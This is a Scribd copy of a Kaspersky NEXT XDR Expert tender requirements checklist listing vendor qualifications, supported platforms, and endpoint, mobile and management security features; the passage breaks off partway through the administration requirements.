0% found this document useful (0 votes)
157 views35 pages

Kaspersky NEXT XDR Expert RFX Tender Requirements 0724 en

The Kaspersky NEXT XDR document outlines the RFx/Tender requirements for Kaspersky's cybersecurity solutions, specifying vendor qualifications, system compatibility, and functional capabilities. Key requirements include a reputable vendor with at least 20 years of experience, comprehensive support for various operating systems, and advanced threat detection features. The document emphasizes the need for a unified management interface, customizable dashboards, and robust protection mechanisms against malware and ransomware.

Uploaded by

Ahnaf Tahmeed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
157 views35 pages

Kaspersky NEXT XDR Expert RFX Tender Requirements 0724 en

The Kaspersky NEXT XDR document outlines the RFx/Tender requirements for Kaspersky's cybersecurity solutions, specifying vendor qualifications, system compatibility, and functional capabilities. Key requirements include a reputable vendor with at least 20 years of experience, comprehensive support for various operating systems, and advanced threat detection features. The document emphasizes the need for a unified management interface, customizable dashboards, and robust protection mechanisms against malware and ransomware.

Uploaded by

Ahnaf Tahmeed
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 35

Kaspersky NEXT XDR

Expert
RFx/Tender requirements

Kaspersky

03.07.2024
Changelog

27.06.2024 Version 1.0 has been created for the following applications:

 Kaspersky Security Center for Windows 14.2


 Kaspersky Security Center for Linux 15.0
 Kaspersky Security Center Cloud Console 15.0.152
 Kaspersky Endpoint Security Cloud 24.6
 Kaspersky Endpoint Security for Windows 12.4
 Kaspersky Endpoint Security for Linux 12.0
 Kaspersky Endpoint Security for Mac 12.0
 Kaspersky Endpoint Detection and Response 6.1
 Kaspersky Unified Monitoring and Analysis Platform 3.1
 Kaspersky Extended Detection and Response 1.1
№ Requirement Compliance Comment
(Yes/No)

Vendor requirements

1. Vendor must be a reputable Company and present in cybersecurity


business for at least 20 years

2. Vendor experts must have proven experience in discovery of


acknowledged vulnerabilities

3. Vendor must possess a range of security intelligence services that


demonstrate overall strength in the domain

4. Vendor must be able to deliver trainings on ATP and/or EDR solution by


request. Trainings must be at least of two distinct types – one for
deploying, administering, and maintaining solutions, another – for
operating the solution from security analyst perspective.

5. Vendor must be able to deliver Incident Response services if needed.

6. Vendor should have Threat Intelligence propositions in its portfolio in a


form of downloadable new threats reports, IOC data, regularly updated
Threat Feeds, etc.

7. Vendor should be able deliver managed Threat Hunting services.

8. Vendor must have premium technical support proposition for ATP and
EDR solution

9. To show the capability of the respondent's threat research or labs team,


the vendor must have a research team, which has published not less
than 100 papers on an APT campaigns and Threat Actors during the last
year.

System requirements (SMP and SMP agents)

10. The proposed solution must support the operating systems below:
 Windows 7 Home / Professional / Ultimate / Enterprise Service
Pack 1 or later
 Windows 8 Professional / Enterprise
 Windows 8.1 Professional / Enterprise
 Windows 10 Home / Pro / Pro for Workstations / Education /
Enterprise / Enterprise multi-session
 Windows 11 Home / Pro / Pro for Workstations / Education /
Enterprise
Servers
 Windows Small Business Server 2011 Essentials / Standard
(64-bit)
 Windows MultiPoint Server 2011 (64-bit)
 Windows Server 2008 R2 Foundation / Standard / Enterprise /
Datacenter Service Pack 1 or later
 Windows Web Server 2008 R2 Service Pack 1 or later
 Windows Server 2012 Foundation / Essentials / Standard /
Datacenter (including Core Mode)
 Windows Server 2012 R2 Foundation / Essentials / Standard /
Datacenter (including Core Mode)
 Windows Server 2016 Essentials / Standard / Datacenter
(including Core Mode)
 Windows Server 2019 Essentials / Standard / Datacenter
(including Core Mode)
 Windows Server 2022 Standard / Datacenter / Datacenter:
Azure Edition (including Core Mode)
Microsoft Terminal Servers
 Microsoft Remote Desktop Services based on Windows Server
2008 R2 SP1
 Microsoft Remote Desktop Services based on Windows Server
2012
 Microsoft Remote Desktop Services based on Windows Server
2012 R2
 Microsoft Remote Desktop Services based on Windows Server
2016
 Microsoft Remote Desktop Services based on Windows Server
2019
 Microsoft Remote Desktop Services based on Windows Server
2022
32-bit Linux operating systems:
 CentOS 6.7 and later
 Debian GNU / Linux 11.0 and later
 Debian GNU / Linux 12.0 and later
 Mageia 4
 Red Hat Enterprise Linux 6.7 and later
 ALT 8 SP Workstation.
 ALT 8 SP Server.
 ALT Workstation 10
 ALT SP Workstation release 10
64-bit Linux operating systems:
 AlmaLinux OS 8 and later.
 AlmaLinux OS 9 and later.
 AlterOS 7.5 and later.
 Amazon Linux 2.
 Astra Linux Common Edition 2.12.
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.5).
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.6).
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.7).
 Astra Linux Special Edition RUSB.10015-16 (release 1)
(operational update 1.6)
 CentOS 6.7 and later
 CentOS 7.2 and later.
 CentOS Stream 8.
 CentOS Stream 9.
 Debian GNU/Linux 11.0 and later.
 Debian GNU/Linux 12.0 and later.
 EMIAS 1.0 and later.
 EulerOS 2.0 SP5.
 Kylin 10.
 Linux Mint 20.3 and up.
 Linux Mint 21.1 and later.
 openSUSE Leap 15.0 and later.
 Oracle Linux 7.3 and later.
 Oracle Linux 8.0 and later.
 Oracle Linux 9.0 and later.
 Red Hat Enterprise Linux 6.7 and later
 Red Hat Enterprise Linux 7.2 and later.
 Red Hat Enterprise Linux 8.0 and later.
 Red Hat Enterprise Linux 9.0 and later.
 Rocky Linux 8.5 and later.
 Rocky Linux 9.1.
 SberLinux 8.8 (Dykhtau).
 SUSE Linux Enterprise Server 12.5 or later.
 SUSE Linux Enterprise Server 15 or later.
 Ubuntu 20.04 LTS.
 Ubuntu 22.04 LTS.
 ALT 8 SP Workstation.
 ALT 8 SP Server.
 ALT Workstation 10
 ALT Server 10.
 ALT SP Workstation release 10.
 ALT SP Server release 10.
 Atlant, Alcyone build, version 2022.02.
 GosLinux 7.17.
 GosLinux 7.2.
 MSVSPHERE 9.2 SERVER.
 MSVSPHERE 9.2 ARM.
 RED OS 7.3.
 ROSA Cobalt 7.9.
 ROSA Chrome 12.
 SynthesisM Client 8.6.
 SynthesisM Server 8.6.
64-bit Arm operating systems:
 Astra Linux Special Edition RUSB.10152-02 (operational
update 4.7).
 CentOS Stream 9.
 EulerOS 2.0 SP8.
 SUSE Linux Enterprise Server 15.
 Ubuntu 22.04 LTS.
 ALT Workstation 10.
 ALT Server 10.
 ALT SP Workstation release 10.
 ALT SP Server release 10.
 RED OS 7.3.
MAC OS operating systems:
 macOS 12 – 14
MAC OS virtualization tools:
 Parallels Desktop 16 for Mac Business Edition
 VMware Fusion 11.5 Professional
 VMware Fusion 12 Professional

11. The proposed solution must support the following virtual platforms:
 Oracle Linux 8.6 and later
 Ubuntu Server 22.04 and later

12. The proposed solution must support deployment to the operating


systems below:
 VMware Workstation 17.0.2 Pro
 VMware ESXi 8.0 Update 2
 Microsoft Hyper-V Server 2019
 Citrix Virtual Apps and Desktops 7 2308
 Citrix Provisioning 2308
 Citrix Hypervisor 8.2 (Cumulative Update 1)
 Oracle Linux 8.6 and later
 Ubuntu Server 22.04 and later

13. The proposed solution must support protection of the latest Operating
Systems versions across all platforms (Windows, Linux, MacOS, iOS,
Android).

Functional requirements (SMP and SMP agents)

1. The solution must provide a single web-based user interface for central
management, incident investigation and response, so administrators and
analysts can monitor the entire infrastructure briefly.

2. The solution must have different administrators functions that have a


single interface/dashboard during sign on and controlled by privileges
and rights based on their functions (Administrator, Reviewer,
Investigator, etc.).

3. The solution must support the creation of custom dashboards,


based on SQL-like search queries on collected events.

4. Dashboards must support the ability to have several different widgets.

5. Reports and dashboards should be easily editable and


customizable according to the needs of solution administrators. The
solution must support the creation of reports based on any field in the
received security events.

6. The solution must provide the ability to export reports to HTML, PDF,
CSV, Split CSV, Excel.

7. The solution must provide the ability to export event search results into
at least one of the following formats: CSV, TXT, TSV.

8. The proposed solution must support Anti-malware Scan Interface


(AMSI).

9. The proposed solution must have the ability to integrate with Windows
Defender Security Center.

10. The proposed solution must support Windows Linux subsystem.

11. The proposed solution must provide next gen protection technologies.
For example:
 protection against file-less threats
 provision of multi-layered Machine Learning (ML) based
protection and behavioral analysis during different stages of the
kill-chain

12. The proposed solution must provide Memory Scanning for Windows
workstations.

13. The proposed solution must provide Kernel Memory Scanning for Linux
workstations.

14. The proposed solution must provide the ability to switch to cloud mode
for threat protection, decreasing RAM and hard disk drive usage for
resource-limited machines.

15. The proposed solution must have dedicated components to monitor,


detect and block activities on Windows, Linux and Windows servers, and
endpoints, to protect against remote encryption attacks.

16. The proposed solution must include signatureless components to detect


threats even without frequent updates. Protection must be powered by
Static ML for pre-execution and Dynamic ML for post-execution stages
of the kill-chain on endpoints and in the cloud for Windows servers and
workstations.

17. The proposed solution must provide behavioral analysis based on ML.

18. The proposed solution must provide the ability to integrate with the
vendor’s own Endpoint Detection and Response (EDR) and Anti-APT
solutions, for active threat hunting and automated incident response.

19. The proposed solution must support integration with a


standalone/independent automated threat detection and prevention
sandbox solution that does not depend on the vendor’s EDR and /or
Anti-APT solution.

20. The proposed solution must include the ability to configure and manage
firewall settings built into the Windows Server and Linux operating
systems, through its management console.

21. The proposed solution must include the following components in a


single agent installed on the endpoint:
 Application, Web and Device Controls
 HIPS and Firewall
 Patch Management
 Encryption

22. The proposed solution must provide Application and Device Controls for
Windows workstations.

23. The proposed solution must include Application Launch/Start Control for
the Windows Server operating system.

24. The proposed solution’s protection for servers and workstations must
include a dedicated component for protection against
ransomware/crypto virus activity on shared resources.
25. The proposed solution must, on detecting ransomware/cryptor-like
activity, automatically block the attacking computer for a specified
interval and list information about the attacking computer IP and
timestamp, and the threat type.

26. The proposed solution must provide a pre-defined list of scan exclusions
for Microsoft applications and services.

27. The proposed solution should support the installation of endpoint


protection on servers without the need to restart.

28. The proposed solution must enable the following for endpoints:
 Manual Scanning
 On-Access Scanning
 On-Demand Scanning
 Compressed File Scanning
 Scan Individual File, Folder and Drive
 Script Blocking and Scanning
 Registry Guard
 Buffer Overflow Protection
 Background/Idle Scanning
 Removable Drive Scanning on connection with system
 The ability to detect and block untrusted hosts on detection of
encryption-like activities on server shared resources.

29. The proposed solution should be password-protected to prevent the AV


process being halted/killed and for self-protection, regardless of the user
authorization level on the system.

30. The proposed solution must have both local and global reputation
databases.

31. The proposed solution must be able to scan HTTPS, HTTP and FTP
traffic against viruses and spyware, or any other malware.

32. The proposed solution must include a personal firewall capable, as an


absolute minimum, of:
 Blocking network activates of applications based on their
categorization.
 Blocking/allowing specific packets, protocols, IP addresses,
ports, and traffic direction.
 The automatic and manual addition of network subnets, and
modification of network activity permissions.
33. The proposed solution must prevent the connection of reprogrammed
USB devices emulating keyboards and enable control of the use of
onscreen keyboards for authorization.

34. The proposed solution must be able to block network attacks and report
the source of the infection.

35. The proposed solution must have local storage on endpoints to keep
copies of files that have been deleted or modified during disinfection.
These files must be stored in a specific format that ensures they cannot
pose any threat.
36. The proposed solution must have a proactive approach to preventing
malware from exploiting existing vulnerabilities on servers and
workstations.

37. The proposed solution must support AM-PPL (Anti-Malware Protected


Process Light) technology for protection against malicious actions.

38. The proposed solution must include protection against attacks that
exploit vulnerabilities in the ARP protocol to spoof the device MAC
address.

39. The proposed solution must include a control component able to learn
to recognize typical user behavior in a specific individual or group of
protected computers, then identify and block anomalous and potentially
harmful actions made by that endpoint or user.

40. The proposed solution must provide Anti-Bridging functionality for


Windows workstations to prevent unauthorized bridges to the internal
network that bypass perimeter protection tools. Administrators should be
able to ban the establishment of simultaneous wired, Wi-Fi, and modem
connections.

41. The proposed solution must include a dedicated component for


scanning encrypted connections.

42. The proposed solution must be able to decrypt and scan network traffic
transmitted over encrypted connections.

43. The proposed solution must have the ability to automatically exclude
web resources when a scan error occurs while performing an encrypted
connection scan. This exclusion must be unique to the host and must
not be shared with other endpoints.

44. The proposed solution must include functionality to remotely wipe data
on the endpoint (for workstations).

45. The proposed solution must include functionality to automatically delete


the data if there is no connection to the endpoint management server.

46. The proposed solution must support signature-based detection in


addition to cloud-assisted and heuristics.

47. The proposed solution should have the ability to raise an alert on, clean,
and delete a detected threat.

48. The proposed solution should have the ability to accelerate scanning
tasks, skipping those objects that have not changed since the previous
scan.

49. The proposed solution should have the ability to prioritize custom and
on-demand scanning tasks for Linux workstations.

50. The proposed solution must allow the administrator to exclude specified
files/ folders/applications/digital certificates from being scanned, either
on-access (real-time protection) or during on-demand scans.
51. The proposed solution should include the functionality to isolate infected
computers.

52. The proposed solution must automatically scan removable drives for
malware when they are attached to any endpoint. Scan control should
be based on drive size.

53. The proposed solution must be able to block the use of USB storage
devices or allow access only to permitted devices and allow read/write
access only by domain users, to reduce data theft and enforce lock
policies.

54. The proposed solution must be able to differentiate between USB


storage devices, printers, mobiles, and other peripherals.

55. The proposed solution must be able to log file operations (Write and
Delete) on USB storage devices. This should not require any additional
license or component to be installed on the endpoint.

56. The proposed solution must have ability to block the execution of any
executable from the USB storage device.

57. The proposed solution must have ability to block/allow user access to
web resources based on websites, content type, user and time of day.

58. The proposed solution must have a specific detection category to block
website banners.

59. The proposed solution must provide the ability to configure Wi-Fi
networks based on Network Name, Authentication Type, Encryption
Type, so these can later be used to block or allow the Wi-Fi connections.

60. The proposed solution must support user-based policies for Device,
Web, and Application Control.

61. The proposed solution should specifically allow the blocking of the
following devices:
 Bluetooth
 Mobile devices
 External modems
 CD/DVDs
 Cameras and Scanners
 MTPs
 And the transfer of data to mobile devices

62. The proposed solution should feature cloud integration, to provide the
fastest possible updates on malware and potential threats.

63. The proposed solution must have ability to manage user access rights
for Read and Write operations on CDs/DVDs, removable storage
devices and MTP devices.

64. The proposed solution must feature firewall filtering by local address,
physical interface, and packet Time-To-Live (TTL).

65. The proposed solution must allow the administrator to monitor the
application’s use of custom/random ports after it has launched.

66. The proposed solution must support the blocking of prohibited (Deny-
List) applications from being launched on the endpoint, and the blocking
of all applications other than those included in Allow-Lists.

67. The proposed solution must have a cloud-integrated Application Control


component for immediate access to the latest updates on application
ratings and categories.

68. The proposed solution must offer protection to files executed in


Windows Server containers.

69. The proposed solution must include traffic malware filtering, web link
verification and web-resource control based on cloud categories.

70. The proposed solution Web Control/Restriction component must include


a Cryptocurrencies and Mining category. It must also include predefined
regional legal restrictions to comply with Belgian and Japanese Law.

71. The proposed solution must have the ability to allow applications based
on their digital signature certificates, MD5, SHA256, META Data, File
Path, and pre-defined security categories.

72. The proposed solution must have controls for the download of DLL and
Drivers.

73. The proposed solution’s application control component must include


Deny List and Allow List operational modes.

74. The proposed solution must support the control of scripts from
PowerShell.

75. The proposed solution must support Test Mode with report generation
on the launch of blocked applications.

76. The proposed solution must have the ability to restrict application
activities within the system according to the trust level assigned to the
application, and to limit the rights of applications to access certain
resources, including system and user files “HIPS functionality”.

77. The proposed solution must have the ability to control system/user
application access to audio and video recording devices.

78. The proposed solution must provide a facility to check applications listed
in each cloud-based category.

79. The proposed solution must have ability to integrate with a vendor-
specific Advanced Threat Protection system.

80. The proposed solution must have ability to automatically regulate the
activity of programs running, including access to the file system and
registry as well as interaction with other programs.

81. The proposed solution must have the ability to automatically delete
Application Control rules if an application is not launched during a
specified interval. The interval must be configurable.

82. The proposed solution must have ability to automatically categorize


applications launched prior to endpoint protection installation.

83. The proposed solution must have endpoint mail threat protection with:
 Attachment filter and the ability to rename attachments.
 Scanning of mail messages when receiving, reading, and
sending.

84. The proposed solution must have the ability to scan multiple redirects,
shortened URLs, hijacked URLs, and time-based delays.

85. The proposed solution must enable the user of the computer to perform
a check on a file’s reputation from the File Context menu.

86. The proposed solution must include the scanning of all scripts, including
those developed in Microsoft Internet Explorer, as well as any WSH
scripts (JavaScript, Visual Basic Script WSH scripts (JavaScript, Visual
Basic Script etc.), launched when the user works on the computer,
including the internet.

87. The proposed solution must provide protection against as yet unknown
malware based of the analysis of their behavior and examination of
changes in the system register, together with a strong remediation
engine to automatically restore any system changes made by the
malware.

88. The proposed solution must provide protection against hacker attacks by
using a firewall with an intrusion detection and prevention system
(IDS/IPS) and network activity rules for more popular applications when
working in computer networks of any type, including wireless networks.

89. The proposed solution must include IPv6 protocol support.

90. The proposed solution must offer scanning of critical sections of the
computer as a standalone task.

91. The proposed solution must incorporate Application Self-Protection


technology:
 protecting against unauthorized the remote management of an
application service.
 protecting access to application parameters by setting a
password.
 preventing the disabling of protection by malware, criminals, or
amateur users.

92. The proposed solution must offer the ability to choose which threat
protection components to install.

93. The proposed solution must include the antivirus checking and
disinfection of files that have been packed using programs like PKLITE,
LZEXE, DIET, EXEPACK, etc.

94. The proposed solution must include the anti-malware checking and
disinfection of files in archives using the RAR, ARJ, ZIP, CAB, LHA,
JAR, ICE formats, including password-protected files.

95. The proposed solution must protect against yet unknown malware
belonging to registered families, based on heuristic analysis.

96. The proposed solution must include multiple ways to notify the
administrator about important events which have taken place (mail
notification, audible announcement, pop-up window, log entry).

97. The proposed solution must allow the administrator to create a single
installer with the required configuration, for use by non-IT literate users.

98. The proposed solution must allow to monitor the use of cloud services
on managed devices running Windows.

99. The proposed solution must support installation in EDR Agent


configuration to support installation alongside third-party solutions.

100. The proposed solution must support usage in Light Agent mode to
protect virtual environments or in standalone mode.

Mobile Device Management (SMP and SMP agents)

1. The proposed solution should be able to protect or manage mobile


devices including Android:
 Android 5.0 or later (including Android 12L, excluding Go
Edition)

2. The proposed solution should be able to protect or manage iOS mobile


devices:
 iOS 10–17 or iPad iOS 13–17

3. The proposed solution must support Android Device Owner devices.

4. The proposed solution must support iOS supervised devices.

5. The proposed solution must enable protection of the smartphone file


system and the interception and scanning of all incoming objects
transferred through wireless connections (infrared port, Bluetooth), EMS
and MMS, while synchronizing with the personal computer and
uploading files through a browser.

6. The proposed solution must have the ability to block malicious sites
designed to spread malicious code, and phishing websites designed to
steal confidential user data and access the user's financial information.

7. The proposed solution must have the functionality to add a website


excluded from the scan to an Allow List.

8. The proposed solution must include website filtering by categories and


allow the administrator to restrict user access to specific categories (for
example, gambling-related websites or social media categories).

9. The proposed solution must enable the administrator to obtain


information about the operation of antivirus and web protection on the
user's mobile device.

10. The proposed solution must have the functionality to detect the location
of the mobile device location via GPS and show this on Google Maps.

11. The proposed solution must enable the administrator to take a picture
(Mugshot) from the front camera of the mobile when it’s locked.

12. The proposed solution must have containerization capabilities for


Android devices.

13. The proposed solution must have the functionality to remotely wipe the
following from Android devices:
 containerized data
 corporate email accounts
 settings for connecting to the corporate Wi-Fi network and VPN
 Access Point Name (APN)
 Android for Work profile
 KNOX container
 KNOX License Manager key

14. The proposed solution must have the functionality to remotely wipe the
following from iOS devices:
 All installed configuration profiles.
 All provisioning profiles.
 The iOS MDM profile
 Applications for which Remove, and the iOS MDM profile check
box have been selected

15. The proposed solution must allow the encryption of all data on the
device (including user account data, removable drives, and apps, as
well as email messages, SMS messages, contacts, photos, and other
files). Access to encrypted data should only be possible on an
unlocked device through a special key or device unlock password.

16. The proposed solution must offer controls to ensure that all devices
comply with corporate security requirements. Compliance Control
should be based on a set of rules which should include the following
components:
 Device check criteria
 Time period allocated for the user to fix the non-compliance.
 action that will be taken on the device if the user does not fix
the non-compliance within the set period.
 Ability to remediate non-compliant devices

17. The proposed solution must have the functionality to detect and to notify
the administrator about device hacks (e.g., rooting, jailbreak).

18. The proposed solution should enable management of at least the


following device features:
 Memory cards and other removable drives
 Device camera
 Wi-Fi connections
 Bluetooth connections
 Infrared connection port
 Wi-Fi access point activation
 Remote desktop connection
 Desktop synchronization
 Configure Exchange Mailbox settings
 Configure mailbox on iOS MDM devices
 Configure Samsung KNOX containers.
 Configure the settings of the Android for Work profile
 Configure Email/Calendar/Contacts
 Configure Media content restriction settings.
 Configure proxy settings on the mobile device
 Configure certificates and SCEP

19. The proposed solution should allow the configuration of a connection to


AirPlay devices to enable the streaming of music, photos, and videos
from the iOS MDM device to AirPlay devices.

20. The proposed solution must support all the below deployment methods
for the mobile agent:
 Google Play, Huawei App Gallery and Apple App Store
 KNOX Mobile Enrollment portal
 Standalone preconfigured installation packages

21. The proposed solution must allow the configuration of Access Point
Names (APN) to connect a mobile device to data transfer services on a
mobile network.

22. The proposed solution must allow the PIN on a mobile device to be
reset remotely.

23. The proposed solution must include the option to enroll Android devices
using 3rd party EMM systems:
 VMware AirWatch 9.3 or later
 MobileIron 10.0 or later
 IBM MaaS360 10.68 or later
 Microsoft Intune 1908 or later
 SOTI MobiControl 14.1.4 (1693) or later

24. The proposed solution must have the functionality to enforce the
installation of a mandatory app on the device.

25. The proposed solution must support user-initiated mobile agent


deployment via:
 Google Play
 Huawei App Gallery
 Apple App Store

26. The proposed solution must be able to scan files opened on the device.

27. The proposed solution must be able to scan programs installed from the
device interface.

28. The proposed solution must be able to scan file system objects on the
device or on connected memory extension cards on request of the user
or according to a schedule.
29. The proposed solution must provide the reliable isolation of infected
objects in a quarantine storage location.

30. The proposed solution must feature the updating of antivirus databases
used to search for malicious programs and deleting dangerous objects.

31. The proposed solution must be able to scan mobile devices for malware
and other unwanted objects on-demand and on-schedule and deal with
them automatically.

32. The proposed solution must be able to manage and monitor mobile
devices from same console as that used to manage computers and
servers.

33. The proposed solution must provide Anti-Theft functionality, so that lost
and/or displaced devices can be located, locked and wiped remotely.

34. The proposed solution must provide the facility to block forbidden
applications from being launched on the mobile device.

35. The proposed solution must be able to enforce security settings, such
as password restrictions and encryption, on mobile devices.

36. The proposed solution must have the ability to push applications
recommended/required by the administrator to the mobile phone.

37. The proposed solution must have Application Control with the
Forbidden/Allowed application modes.

38. The proposed solution must include a subscription model.

39. The proposed solution must protect from online threats on iOS devices.

Centralized administration, monitoring, and update software requirements (SMP and SMP agents)

1. The proposed solution must support installation on the following


Operating Systems:
Windows:
 Windows Server 2008 R2 Standard with Service Pack 1 and
later 64-bit
 Windows Server 2012 Server Core 64-bit
 Windows Server 2012 Datacenter 64-bit
 Windows Server 2012 Essentials 64-bit
 Windows Server 2012 Foundation 64-bit
 Windows Server 2012 Standard 64-bit
 Windows Server 2012 R2 Server Core 64-bit
 Windows Server 2012 R2 Datacenter 64-bit
 Windows Server 2012 R2 Essentials 64-bit
 Windows Server 2012 R2 Foundation 64-bit
 Windows Server 2012 R2 Standard 64-bit
 Windows Server 2016 Datacenter (LTSB) 64-bit
 Windows Server 2016 Standard (LTSB) 64-bit
 Windows Server 2016 Server Core (Installation Option) (LTSB)
64-bit
 Windows Server 2019 Standard 64-bit
 Windows Server 2019 Datacenter 64-bit
 Windows Server 2019 Core 64-bit
 Windows Server 2022 Standard 64-bit
 Windows Server 2022 Datacenter 64-bit
 Windows Server 2022 Core 64-bit
 Windows Storage Server 2012 64-bit
 Windows Storage Server 2012 R2 64-bit
 Windows Storage Server 2016 64-bit
 Windows Storage Server 2019 64-bit
Linux:
 Debian GNU/Linux 10.х (Buster) 64-bit
 Debian GNU/Linux 11.х (Bullseye) 64-bit
 Debian GNU/Linux 12 (Bookworm) 64-bit
 Ubuntu Server 18.04 LTS (Bionic Beaver) 64-bit
 Ubuntu Server 20.04 LTS (Focal Fossa) 64-bit
 Ubuntu Server 22.04 LTS (Jammy Jellyfish) 64-bit
 CentOS 7.x 64-bit
 CentOS Stream 9 64-bit
 Red Hat Enterprise Linux Server 7.x 64-bit
 Red Hat Enterprise Linux Server 8.x 64-bit
 Red Hat Enterprise Linux Server 9.x 64-bit
 SUSE Linux Enterprise Server 12 (all Service Packs) 64-bit
 SUSE Linux Enterprise Server 15 (all Service Packs) 64-bit
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.6) 64-bit
 Astra Linux Special Edition RUSB.10015-01 (operational
update 1.7) 64-bit
 Astra Linux Common Edition (operational update 2.12) 64-bit
 ALT SP Server 10 64-bit
 ALT Server 10 64-bit
 ALT Server 9.2 64-bit
 ALT 8 SP Server (LKNV.11100-01) 64-bit
 ALT 8 SP Server (LKNV.11100-02) 64-bit
 ALT 8 SP Server (LKNV.11100-03) 64-bit
 Oracle Linux 7 64-bit
 Oracle Linux 8 64-bit
 Oracle Linux 9 64-bit
 RED OS 7.3 Server 64-bit
 RED OS 7.3 Certified Edition 64-bit
 ROSA COBALT 7.9 64-bit

2. The proposed solution must support the following database servers:


Windows:
 Microsoft SQL Server 2012 Express 64-bit
 Microsoft SQL Server 2014 Express 64-bit
 Microsoft SQL Server 2016 Express 64-bit
 Microsoft SQL Server 2017 Express 64-bit
 Microsoft SQL Server 2019 Express 64-bit
 Microsoft SQL Server 2014 (all editions) 64-bit
 Microsoft SQL Server 2016 (all editions) 64-bit
 Microsoft SQL Server 2017 (all editions) on Windows 64-bit
 Microsoft SQL Server 2017 (all editions) on Linux 64-bit
 Microsoft SQL Server 2019 (all editions) on Windows 64-bit
(requires additional actions)
 Microsoft SQL Server 2019 (all editions) on Linux 64-bit
(requires additional actions)
 Microsoft Azure SQL Database
 All supported SQL Server editions in Amazon RDS and
Microsoft Azure cloud platforms
 MySQL 5.7 Community 32-bit/64-bit
 MySQL Standard Edition 8.0 (release 8.0.20 and later)
32-bit/64-bit
 MySQL Enterprise Edition 8.0 (release 8.0.20 and later)
32-bit/64-bit
 MariaDB 10.1 (build 10.1.30 and later) 32-bit/64-bit
 MariaDB 10.3 (build 10.3.22 and later) 32-bit/64-bit
 MariaDB 10.4 (build 10.4.26 and later) 32-bit/64-bit
 MariaDB 10.5 (build 10.5.17 and later) 32-bit/64-bit
 MariaDB Server 10.3 32-bit/64-bit with InnoDB storage engine
 MariaDB Galera Cluster 10.3 32-bit/64-bit with InnoDB storage
engine
 PostgreSQL 13.x 64-bit
 PostgreSQL 14.x 64-bit
 Postgres Pro 13.x (all editions)
 Postgres Pro 14.x (all editions)
Linux:
 MySQL 5.7 Community 32-bit/64-bit
 MySQL 8.0 32-bit/64-bit
 MariaDB 10.4 (build 10.4.26 and later) 32-bit/64-bit
 MariaDB 10.5 (build 10.5.17 and later) 32-bit/64-bit
 MariaDB Galera Cluster 10.3 32-bit/64-bit with InnoDB storage
engine
 PostgreSQL 13.х 64-bit
 PostgreSQL 14.х 64-bit
 PostgreSQL 15.х 64-bit
 Postgres Pro 13.х 64-bit (all editions)
 Postgres Pro 14.х 64-bit (all editions)
 Postgres Pro 15.х 64-bit (all editions)
 Platform V Pangolin 5.4.0 64-bit

3. The proposed solution must support the following virtual platforms:


Windows:
 VMware vSphere 6.7
 VMware vSphere 7.0
 VMware Workstation 16 Pro
 Microsoft Hyper-V Server 2012 64-bit
 Microsoft Hyper-V Server 2012 R2 64-bit
 Microsoft Hyper-V Server 2016 64-bit
 Microsoft Hyper-V Server 2019 64-bit
 Microsoft Hyper-V Server 2022 64-bit
 Citrix XenServer 7.1 LTSR
 Citrix XenServer 8.x
 Parallels Desktop 17
 Oracle VM VirtualBox 6.x
Linux:
 VMware vSphere 6.7
 VMware vSphere 7.0
 VMware vSphere 8.0
 VMware Workstation 16 Pro
 VMware Workstation 17 Pro
 Microsoft Hyper-V Server 2012 64-bit
 Microsoft Hyper-V Server 2012 R2 64-bit
 Microsoft Hyper-V Server 2016 64-bit
 Microsoft Hyper-V Server 2019 64-bit
 Microsoft Hyper-V Server 2022 64-bit
 Citrix XenServer 7.1 LTSR
 Citrix XenServer 8.x
 Parallels Desktop 17
 Oracle VM VirtualBox 6.x
 Oracle VM VirtualBox 7.x
 Kernel-based Virtual Machine (all Linux operating systems
supported by Administration server)

4. The proposed solution must enable the installation of anti-malware


software from a single distribution package.

5. The proposed solution must have customizable installation profiles


depending on the number of protected nodes.

6. The proposed solution must support IPv6 addresses.

7. The proposed solution must support two-step verification


(authentication).

8. The proposed solution must have ability to read information from Active
Directory to obtain data about computer accounts in the organization.

9. The proposed solution must include a built-in web console for the
management of the endpoints, which should not require any additional
installation.

10. The proposed solution’s web management console should be


straightforward to use and must support touch screen devices.

11. The proposed solution must automatically distribute computer accounts


by management group if new computers appear on the network. It must
provide the ability to set the transfer rules according IP address, type of
the operating system and location in Organizational Units of Active
Directory.

12. The proposed solution must provide for the centralized installation,
update and removal of anti-malware software, together with centralized
configuration, administration, and the viewing of reports and statistical
information about its operation.

13. The proposed solution must feature the centralized removal (manual
and automatic) of incompatible applications from the administration
center.

14. The proposed solution must provide flexible methods for anti-malware
agent installation: RPC, GPO, an administration agent for remote
installation and the option to create a standalone installation package
for local installation.

15. The proposed solution must enable the remote installation of anti-
malware software with the latest anti-malware databases.
16. The proposed solution must enable the automatic update of anti-
malware software and anti-malware databases.

17. The proposed solution must have automatic search facilities for
vulnerabilities in applications and in the operating system on protected
machines.

18. The proposed solution must enable the management of a component


prohibiting the installation and/or running of programs.

19. The proposed solution must enable the management of a component


controlling work with external I/O devices.

20. The proposed solution must enable the management of a component


controlling user activity on the internet.

21. The proposed solution must allow for the testing of downloaded updates
by means of the centralized administration software prior to distributing
them to client machines, and the delivery of updates to user workplaces
immediately after receiving them.

22. The proposed solution must be able to automatically deploy protection


to virtual infrastructures based on VMware ESXi, Microsoft Hyper-V,
Citrix XenServer virtualization platform or hypervisor.

23. The proposed solution must enable the creation of a hierarchy of


administration servers at an arbitrary level and the ability to centrally
managing the entire hierarchy from the upper level.

24. The proposed solution must support Managed Services Mode for
administration servers, so that logically isolated administration server
instances can be set up for different users and user groups.

25. The proposed solution must give access to the anti-malware security
vendor’s cloud services via the administration server.

26. The proposed solution must include the automatic distribution of


licenses on client computers.

27. The proposed solution must be able to perform inventories of software


and hardware installed on user computers.

28. The proposed solution must have a notification mechanism to inform


users about events in the installed anti-malware software and settings,
and to distribute notifications about events via email.

29. The proposed solution must enable the centralized installation of third-
party applications on all or selected computers.

30. The proposed solution must have the ability to specify any computer in
the organization as a center for relaying updates and installation
packages, in order to reduce the network load on the main
administration server system.

31. The proposed solution must have the ability to specify any computer in
the organization as a center for forwarding anti-malware agent events
from the selected group of client computers to the centralized
